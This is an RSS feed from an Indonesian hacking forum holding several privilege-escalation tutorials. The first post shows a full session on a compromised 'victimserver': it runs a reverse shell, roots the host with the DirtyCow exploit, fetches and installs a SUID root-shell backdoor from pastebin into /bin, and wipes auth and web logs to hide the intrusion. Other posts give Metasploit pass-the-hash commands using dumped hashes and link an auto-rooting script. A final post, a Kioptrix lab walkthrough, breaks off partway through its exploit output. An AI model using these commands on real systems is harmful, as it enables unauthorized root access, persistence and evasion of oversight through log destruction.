<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BackBox Indonesia - Privilege Escalation]]></title>
		<link>https://www.backboxindonesia.or.id/</link>
		<description><![CDATA[BackBox Indonesia - https://www.backboxindonesia.or.id]]></description>
		<pubDate>Thu, 25 Jun 2026 16:11:33 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Mempertahankan akses root dengan suid program (rootkit)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-182.html</link>
			<pubDate>Tue, 27 Dec 2016 02:44:23 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-182.html</guid>
			<description><![CDATA[Hallo guys, kali ini saya akan membahas cara mempertahankan akses root server yang sudah kita rooting sebelumnya. Dalam thread kali ini saya tidak akan ngomong panjang lebar, tapi akan memberikan penjelasan singkat. ilustrasi di bawah adalah server yang sudah saya backconnect dan di rooting servernya terlebih dahulu.<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@backbox:~# nc -lvp 123<br />
listening on [any] 123 ...<br />
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55116<br />
/bin/sh: 0: can't access tty; job control turned off<br />
&#36; id<br />
uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />
&#36; curl <a href="https://www.exploit-db.com/download/40616" target="_blank" class="mycode_url">https://www.exploit-db.com/download/40616</a> -s -o dirtycow.c<br />
&#36; gcc dirtycow.c -o dirtycow -pthread<br />
&#36; ./dirtycow<br />
DirtyCow root privilege escalation<br />
Backing up /usr/bin/passwd.. to /tmp/bak<br />
Size of binary: 57048<br />
Racing, this may take a while..<br />
/usr/bin/passwd is overwritten<br />
Popping root shell.<br />
Don't forget to restore /tmp/bak<br />
thread stopped<br />
thread stopped<br />
id<br />
uid=0(root) gid=0(root) groups=0(root)<br />
python -c "import pty; pty.spawn('/bin/bash')"<br />
root@victimserver:/var/www/html# curl <a href="https://pastebin.com/raw/MPqsAfsY" target="_blank" class="mycode_url">https://pastebin.com/raw/MPqsAfsY</a> -s -o suid.c<br />
root@victimserver:/var/www/html# cat suid.c<br />
#include &lt;stdio.h&gt;<br />
#include &lt;sys/types.h&gt;<br />
#include &lt;unistd.h&gt;<br />
<br />
int main()<br />
{<br />
    setuid(0);<br />
    setgid(0);<br />
    system("/bin/bash");<br />
    return 0;<br />
}<br />
root@victimserver:/var/www/html# gcc suid.c -o rksh<br />
root@victimserver:/var/www/html# chmod +s rksh<br />
root@victimserver:/var/www/html# mv rksh /bin/rksh</blockquote>
<br />
Di atas adalah ilustrasi server yang sudah kita rooting dan di sisipkan suid program di folder /bin/<br />
Untuk mengeksekusi suid yang sudah kita buat tadi kita bisa langsung meng eksekusinya di user biasa dengan ilustrasi seperti ini.<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@backbox:~# nc -lvp 123<br />
listening on [any] 123 ...<br />
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55216<br />
/bin/sh: 0: can't access tty; job control turned off<br />
&#36; id<br />
uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />
&#36; rksh<br />
python -c "import pty; pty.spawn('/bin/bash')"<br />
root@victimserver:/var/www/html# id<br />
id<br />
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)<br />
root@victimserver:/var/www/html#</blockquote>
<br />
Setelah kita melakukan aktivitas tersebut, alangkah baiknya kita menghapus log yang telah kita tinggalkan. Cukup hapus log yang perlu saja jangan terlalu rusuh ngehapus semua lognya. Think smart bro :v<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@victimserver:/var/www/html# echo "" &gt; /var/log/auth.log<br />
root@victimserver:/var/www/html# echo "" &gt; /var/log/apache2/access.log<br />
root@victimserver:/var/www/html# echo "" &gt; /var/log/lastlog<br />
root@victimserver:/var/www/html# history -c</blockquote>
<br />
Mungkin cukup sekian tutorial singkat dari saya.<br />
Thanks for reading :]]></description>
			<content:encoded><![CDATA[Hallo guys, kali ini saya akan membahas cara mempertahankan akses root server yang sudah kita rooting sebelumnya. Dalam thread kali ini saya tidak akan ngomong panjang lebar, tapi akan memberikan penjelasan singkat. ilustrasi di bawah adalah server yang sudah saya backconnect dan di rooting servernya terlebih dahulu.<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@backbox:~# nc -lvp 123<br />
listening on [any] 123 ...<br />
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55116<br />
/bin/sh: 0: can't access tty; job control turned off<br />
&#36; id<br />
uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />
&#36; curl <a href="https://www.exploit-db.com/download/40616" target="_blank" class="mycode_url">https://www.exploit-db.com/download/40616</a> -s -o dirtycow.c<br />
&#36; gcc dirtycow.c -o dirtycow -pthread<br />
&#36; ./dirtycow<br />
DirtyCow root privilege escalation<br />
Backing up /usr/bin/passwd.. to /tmp/bak<br />
Size of binary: 57048<br />
Racing, this may take a while..<br />
/usr/bin/passwd is overwritten<br />
Popping root shell.<br />
Don't forget to restore /tmp/bak<br />
thread stopped<br />
thread stopped<br />
id<br />
uid=0(root) gid=0(root) groups=0(root)<br />
python -c "import pty; pty.spawn('/bin/bash')"<br />
root@victimserver:/var/www/html# curl <a href="https://pastebin.com/raw/MPqsAfsY" target="_blank" class="mycode_url">https://pastebin.com/raw/MPqsAfsY</a> -s -o suid.c<br />
root@victimserver:/var/www/html# cat suid.c<br />
#include &lt;stdio.h&gt;<br />
#include &lt;sys/types.h&gt;<br />
#include &lt;unistd.h&gt;<br />
<br />
int main()<br />
{<br />
    setuid(0);<br />
    setgid(0);<br />
    system("/bin/bash");<br />
    return 0;<br />
}<br />
root@victimserver:/var/www/html# gcc suid.c -o rksh<br />
root@victimserver:/var/www/html# chmod +s rksh<br />
root@victimserver:/var/www/html# mv rksh /bin/rksh</blockquote>
<br />
Di atas adalah ilustrasi server yang sudah kita rooting dan di sisipkan suid program di folder /bin/<br />
Untuk mengeksekusi suid yang sudah kita buat tadi kita bisa langsung meng eksekusinya di user biasa dengan ilustrasi seperti ini.<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@backbox:~# nc -lvp 123<br />
listening on [any] 123 ...<br />
connect to [49.236.**.***] from victimserver.xyz [202.158.**.***] 55216<br />
/bin/sh: 0: can't access tty; job control turned off<br />
&#36; id<br />
uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />
&#36; rksh<br />
python -c "import pty; pty.spawn('/bin/bash')"<br />
root@victimserver:/var/www/html# id<br />
id<br />
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)<br />
root@victimserver:/var/www/html#</blockquote>
<br />
Setelah kita melakukan aktivitas tersebut, alangkah baiknya kita menghapus log yang telah kita tinggalkan. Cukup hapus log yang perlu saja jangan terlalu rusuh ngehapus semua lognya. Think smart bro :v<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@victimserver:/var/www/html# echo "" &gt; /var/log/auth.log<br />
root@victimserver:/var/www/html# echo "" &gt; /var/log/apache2/access.log<br />
root@victimserver:/var/www/html# echo "" &gt; /var/log/lastlog<br />
root@victimserver:/var/www/html# history -c</blockquote>
<br />
Mungkin cukup sekian tutorial singkat dari saya.<br />
Thanks for reading :]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Rooting server dari nmap (privilege escallation)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-164.html</link>
			<pubDate>Tue, 30 Aug 2016 13:33:13 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-164.html</guid>
			<description><![CDATA[Selamat malam guys.<br />
Udah lama ngga nongol bikin tutor nih.. heheheheh<br />
Kali ini saya mau ngasih bocoran kalo nge rooting server dari nmap bisa loohhh..<br />
Penasaran ya gimana caranya???<br />
Tonton aja tutornya di mari..<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/Gc4L1V9-874" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<br />
Celah ini ngga berlaku di tiap versi nmap, apalagi nmap versi terbaru. so kalo kalian nemu server yang ke install nmap veri 4.53 atau versi terdahulu, mungkin bisa aja server yang kalian dapet itu bisa di rooting dengan cara ini..<br />
Akhir kata dari ane..<br />
Go open source indonesia :)]]></description>
			<content:encoded><![CDATA[Selamat malam guys.<br />
Udah lama ngga nongol bikin tutor nih.. heheheheh<br />
Kali ini saya mau ngasih bocoran kalo nge rooting server dari nmap bisa loohhh..<br />
Penasaran ya gimana caranya???<br />
Tonton aja tutornya di mari..<br />
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/Gc4L1V9-874" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<br />
Celah ini ngga berlaku di tiap versi nmap, apalagi nmap versi terbaru. so kalo kalian nemu server yang ke install nmap veri 4.53 atau versi terdahulu, mungkin bisa aja server yang kalian dapet itu bisa di rooting dengan cara ini..<br />
Akhir kata dari ane..<br />
Go open source indonesia :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Horizontal Privilege Escalation dengan Metasploit - Pass the Hash attack]]></title>
			<link>https://www.backboxindonesia.or.id/thread-137.html</link>
			<pubDate>Sun, 26 Jun 2016 04:02:05 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-137.html</guid>
			<description><![CDATA[Horizontal privilege escalation adalah tahap ketika kita ingin mendapatkan hak akses yang tingkatnya sama alangkah untuk mengakses suatu yang kita tidak dapat akses. Biasanya Horizontal Privilege Escalation menyerang komputer berbeda dalam 1 network, untuk bypass Firewall, atau mendapatkan akses yang hanya suatu komputer bisa akses.<br />
<br />
Kali ini saya akan menggunakan Exploit yang bernama Pass the Hash (sering disingkat PTH) untuk melakukan Horizontal Privilege Escalation. Sebelumnya supaya gak jadi Script Kiddies saya akan jelaskan cara Pass the Hash Attack bekerja,<br />
pada dasarnya pass the hash bagus dikarenakan kita login dengan hash nya, (hash LanMan) pada dasarnya Pass the Hash bisa dilakukan untuk seluruh server yang mengizinkan LM atau NTLM Autentikasi<br />
<br />
Mari langsung bahas aja ya :)<br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">oke ketika kau sudah punya Meterpreter session masukan "hashdump"</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">perintah ini akan memberi username dan juga hash password dari username yang kita leak</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian masukan "shell" terus "ipconfig" untuk memperlihatkan IP</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">liat sesi background kita dengan memasukan perintah "background"</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian masukan "route add (ip korban) (ip proxy mu)"</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian kita cari apakah ada yang pakek password ynag sama di network dengan perintah</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">use auxiliary/scanner/smb/smb_login</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set RHOSTS 10.10.10.101-120</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set SMBUser Administrator</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set verbose false</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">run</span></span><br />
<br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">yang diatas tidak akan melogin hanya mencari sebuah device yang hashdumpnya sama, untuk login masukan perintah ini</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">use windows/smb/psexec<br />
set SMBUser Administrator<br />
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b<br />
set RHOST <a href="https://www.facebook.com/notes/ignitive/methods-pass-the-hash-attack-metasploit/923768027716787#" target="_blank" class="mycode_url"><span style="color: #365899;" class="mycode_color">10.10.10.103</span></a><br />
exploit</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian untuk membuktikan masukan</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">shell</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">ipconfig</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">selesai</span></span>]]></description>
			<content:encoded><![CDATA[Horizontal privilege escalation adalah tahap ketika kita ingin mendapatkan hak akses yang tingkatnya sama alangkah untuk mengakses suatu yang kita tidak dapat akses. Biasanya Horizontal Privilege Escalation menyerang komputer berbeda dalam 1 network, untuk bypass Firewall, atau mendapatkan akses yang hanya suatu komputer bisa akses.<br />
<br />
Kali ini saya akan menggunakan Exploit yang bernama Pass the Hash (sering disingkat PTH) untuk melakukan Horizontal Privilege Escalation. Sebelumnya supaya gak jadi Script Kiddies saya akan jelaskan cara Pass the Hash Attack bekerja,<br />
pada dasarnya pass the hash bagus dikarenakan kita login dengan hash nya, (hash LanMan) pada dasarnya Pass the Hash bisa dilakukan untuk seluruh server yang mengizinkan LM atau NTLM Autentikasi<br />
<br />
Mari langsung bahas aja ya :)<br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">oke ketika kau sudah punya Meterpreter session masukan "hashdump"</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">perintah ini akan memberi username dan juga hash password dari username yang kita leak</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian masukan "shell" terus "ipconfig" untuk memperlihatkan IP</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">liat sesi background kita dengan memasukan perintah "background"</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian masukan "route add (ip korban) (ip proxy mu)"</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian kita cari apakah ada yang pakek password ynag sama di network dengan perintah</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">use auxiliary/scanner/smb/smb_login</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set RHOSTS 10.10.10.101-120</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set SMBUser Administrator</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">set verbose false</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">run</span></span><br />
<br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">yang diatas tidak akan melogin hanya mencari sebuah device yang hashdumpnya sama, untuk login masukan perintah ini</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">use windows/smb/psexec<br />
set SMBUser Administrator<br />
set SMBPass 6426ef8fb58cb019f9393d97e7a1873c:ab804e3bcd824cee3b6fc0053424a29b<br />
set RHOST <a href="https://www.facebook.com/notes/ignitive/methods-pass-the-hash-attack-metasploit/923768027716787#" target="_blank" class="mycode_url"><span style="color: #365899;" class="mycode_color">10.10.10.103</span></a><br />
exploit</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">kemudian untuk membuktikan masukan</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">shell</span></span><br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">ipconfig</span></span><br />
<br />
<span style="color: #1d2129;" class="mycode_color"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">selesai</span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Bash auto rooting server v3 (Exploit-db Collection)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-54.html</link>
			<pubDate>Sun, 13 Mar 2016 09:08:15 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-54.html</guid>
			<description><![CDATA[Kali ini saya akan share tool untuk auto rooting server. tools ini gunanya untuk kalian yang suka rooting server atau yang suka belajar ctf dll..<br />
Tools ini hanya work di linux arsitektur i368/32bit<br />
<br />
Link download :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>http://pastebin.com/LiiY8R0s</code></div></div><br />
<br />
save dengan extensi .sh<br />
<br />
Cara menggunakan :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; chmod 0777 file.sh<br />
&#36; bash file.sh<br />
atau<br />
&#36; sh file.sh</code></div></div><br />
Screen shoot bisa lihat di sini<br />
<br />
<img src="http://i.imgur.com/BeZfFfR.png" alt="[Image: BeZfFfR.png]" class="mycode_img" /><br />
<br />
Terimakasih :D]]></description>
			<content:encoded><![CDATA[Kali ini saya akan share tool untuk auto rooting server. tools ini gunanya untuk kalian yang suka rooting server atau yang suka belajar ctf dll..<br />
Tools ini hanya work di linux arsitektur i368/32bit<br />
<br />
Link download :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>http://pastebin.com/LiiY8R0s</code></div></div><br />
<br />
save dengan extensi .sh<br />
<br />
Cara menggunakan :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; chmod 0777 file.sh<br />
&#36; bash file.sh<br />
atau<br />
&#36; sh file.sh</code></div></div><br />
Screen shoot bisa lihat di sini<br />
<br />
<img src="http://i.imgur.com/BeZfFfR.png" alt="[Image: BeZfFfR.png]" class="mycode_img" /><br />
<br />
Terimakasih :D]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Pembahasan Kioptrix Level 1 : SSL Exploit]]></title>
			<link>https://www.backboxindonesia.or.id/thread-22.html</link>
			<pubDate>Thu, 10 Mar 2016 11:42:40 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-22.html</guid>
			<description><![CDATA[<a href="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5Q/c0s60i04-2U/s1600/Screenshot_2016-02-26_13-29-46.png" target="_blank" class="mycode_url"><img src="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5Q/c0s60i04-2U/s400/Screenshot_2016-02-26_13-29-46.png" width="400" height="197" alt="[Image: Screenshot_2016-02-26_13-29-46.png]" class="mycode_img" /></a><br />
Kioptrix Level 1 Mod SSL Exploit - Melanjutkan posting sebelum nya yang membahas cara exploit kiotrix di service samba <a href="http://www.backboxindonesia.or.id/thread-21.html" target="_blank" class="mycode_url">Pembahasan Kioptrix Level 1 : Samba Exploit</a>. untuk posting kali ini akan membahas bagaimana cara exploit kiotrix level 1 pada SSL nya sendiri yang mempunyai bug buffer overflow.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Tool Yang Dibutuhkan</span><br />
<ol type="1" class="mycode_list">
</li>
<li>Nmap<br />
</li>
<li>Metasploit <br />
</li>
<li>Nikto<br />
</li>
<li>Kioptrix Level 1 : <a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar" target="_blank" class="mycode_url">Download disini</a><br />
</li></ol>
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Mencari Ip Target</span></span><br />
Dalam mencari ip target, saya menggunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sn</span> untuk melakukan Ping scan agar dapat mencari host yg live<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:06 HKT<br />
<span style="color: #ff0000;" class="mycode_color">Nmap scan report for 192.168.33.128</span><br />
Host is up (0.00042s latency).<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)<br />
Nmap scan report for 192.168.33.254<br />
Host is up (0.000044s latency).<br />
MAC Address: 00:50:56:E2:65:F0 (VMware)<br />
Nmap scan report for 192.168.33.1<br />
Host is up.<br />
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Service Pada Server</span></span><br />
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sV </span>untuk melakukan service version scanning<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:38 HKT<br />
Nmap scan report for 192.168.33.128<br />
Host is up (0.00022s latency).<br />
Not shown: 994 closed ports<br />
PORT     STATE SERVICE     VERSION<br />
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)<br />
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
111/tcp  open  rpcbind     2 (RPC #100000)<br />
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)<br />
<span style="color: #ff0000;" class="mycode_color">443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (<span style="font-weight: bold;" class="mycode_b">Red-Hat</span>/Linux) </span>mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
1024/tcp open  status      1 (RPC #100024)<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Web Server For Vulnerabilities</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">Nikto</span></span> adalah salah satu tool yang digunakan untuk melakukan scanning terhadap web server sehingga bisa mengetahui  'vulnerabilities' pada suatu server.<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nikto -h 192.168.33.128<br />
- Nikto v2.1.6<br />
---------------------------------------------------------------------------<br />
+ Target IP:          192.168.33.128<br />
+ Target Hostname:    192.168.33.128<br />
+ Target Port:        80<br />
+ Start Time:         2016-03-01 01:51:01 (GMT8)<br />
---------------------------------------------------------------------------<br />
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b<br />
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 11<img src="https://www.backboxindonesia.or.id/images/backbox/smilies/12.png" alt="12" title="12" class="smilie smilie_43" />46 2001<br />
+ The anti-clickjacking X-Frame-Options header is not present.<br />
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS<br />
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type<br />
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header<br />
........<br />
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.<br />
<span style="color: #ff0000;" class="mycode_color">+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.</span><br />
<span style="color: #ff3333;" class="mycode_color">+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.<br />
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082" target="_blank" class="mycode_url">http://cve.mitre.org/cgi-bin/cvename.cgi...-2002-0082</a>, OSVDB-756.</span><br />
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.<br />
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank" class="mycode_url">http://www.cert.org/advisories/CA-2000-02.html</a>. ......</blockquote>
Yup disitu tertera kalau mod_ssl nya bisa kita remote exploit sehingga bisa mendapatkan remote shell<br />
<br />
Exploit yang saya gunakan adalah <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">OpenFuckV2</span></span> yang bisa di temukan di <a href="https://www.exploit-db.com/exploits/764/" target="_blank" class="mycode_url">Exploit-DB</a><br />
<span style="color: #ff0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">[+]</span></span> Tapi untuk diketahui bahwa exploit OpenFuck sendiri merupakan exploit yang <span style="color: #ff0000;" class="mycode_color">lama</span>, sehingga membutuhkan sedikit <span style="color: #ff0000;" class="mycode_color">tambahan pada script</span> nya, untk mengetahui tambahan nya kunjungi link berikut : <a href="http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/" target="_blank" class="mycode_url">paulsec.github.io</a><br />
<br />
<span style="color: #ff0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">[+]</span></span> Pada step 2 memperbaiki exploit openfuck menggunakan link dl.packetstormsecurity.net untuk mendownload exploit ptrace-kmod.c, karena saya tau bahwa Kiotrix Server pada Lab saya <span style="color: #ff0000;" class="mycode_color">tidak terkoneksi ke internet</span>, jadi saya <span style="color: #ff0000;" class="mycode_color">pindahkan ptrace-kmod.c ke localhost</span> ( mv ptrace-kmod.c var/www/html ) , karena di <span style="color: #ff0000;" class="mycode_color">local network tidak membutuhkan jaringan internet</span> untuk saling berkomunikasi, sehingga menjadi seperti digambar<br />
<div style="text-align: center;" class="mycode_align"><a href="https://3.bp.blogspot.com/-dX86_yZcQuA/VtR_hdguACI/AAAAAAAAA6E/BJMCHRvloRM/s1600/Selection_007.png" target="_blank" class="mycode_url"><img src="https://3.bp.blogspot.com/-dX86_yZcQuA/VtR_hdguACI/AAAAAAAAA6E/BJMCHRvloRM/s400/Selection_007.png" width="400" height="32" alt="[Image: Selection_007.png]" class="mycode_img" /></a></div>
lalu setelah itu saya <span style="font-style: italic;" class="mycode_i">compile</span> OpenFuck setelah mengikuti step di paulsec.github.io selain step no. 2<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Exploiting Kioptrix SSL</span></span><br />
<br />
Setelah exploitnya udh dicompile, saat nya eksekusi<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden/evil# ./OpenFuck | grep 1.3.20<br />
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)<br />
    0x27 - FreeBSD (apache-1.3.20)<br />
    0x28 - FreeBSD (apache-1.3.20)<br />
    0x29 - FreeBSD (apache-1.3.20+2.8.4)<br />
    0x2a - FreeBSD (apache-1.3.20_1)<br />
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)<br />
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)<br />
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)<br />
<span style="color: #ff0000;" class="mycode_color">    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1</span><br />
<span style="color: #ff0000;" class="mycode_color">    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2</span><br />
    0x7e - Slackware Linux 8.0 (apache-1.3.20)<br />
    0x86 - SuSE Linux 7.3 (apache-1.3.20)</blockquote>
